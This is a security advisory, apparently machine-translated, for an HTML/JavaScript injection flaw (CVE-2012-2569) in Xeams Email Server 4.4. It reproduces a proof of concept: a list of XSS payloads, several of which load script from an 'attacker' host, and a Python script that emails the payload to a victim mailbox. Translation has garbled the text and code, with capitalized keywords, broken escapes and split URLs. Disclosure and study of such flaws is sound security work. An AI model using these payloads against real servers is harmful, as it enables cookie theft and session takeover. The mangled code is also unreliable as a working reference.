Xeams Email Server 'body' field HTML Injection Vulnerability

Release date:
Updated on:

Affected Systems:
Xeams Email Server 4.4 Build 5720
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54902
Cve id: CVE-2012-2569

Xeams is an email server that is applicable to Windows, Linux, Solaris, MacOSX, or UNIX. It supports SMTP, POP3, and IMAP.

Xeams Email Server 4.4 Build 5720 and other versions have the HTML injection vulnerability in implementation. Attackers can provide HTML or JS Code and run it in the affected sites, attackers can steal Cookie authentication creden。 or control the appearance of the site.

<* Source: loneferret
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Loneferret () provides the following test methods:

#! /Usr/bin/python

'''

Author: loneferret of Offensive Security
Product: Xeams Email Server
Version: 4.4 Build 5720
Vendor Site: http://www.xeams.com

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <script src = http: // attacker/xss. js> </SCRIPT>
3: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
4: <SCRIPT> alert ('xsss') </SCRIPT>
5: <META HTTP-EQUIV = "refresh" CONTENT = "0; url = data: text/html; base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
6: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
7: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
8: <SCRIPT> alert ("XSS"); // </SCRIPT>
9: <SCRIPT> alert ("XSS") </SCRIPT> ">
10: <SCRIPT> a =/XSS/
Alert (a. source) </SCRIPT>
11: <SCRIPT = "blah" SRC = "http: // attacker/xss. js"> </SCRIPT>
12: <SCRIPT a = "blah" ''src = "http: // attacker/xss. js"> </SCRIPT>
13: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
14: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
15: <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT>
16: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
17: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>

'''

Import smtplib, urllib2

Payload = "" <script src = http: // attacker/xss. js> </SCRIPT> """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: Offensive Security \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS" + payload + "\ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Xeams
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.xeams.com/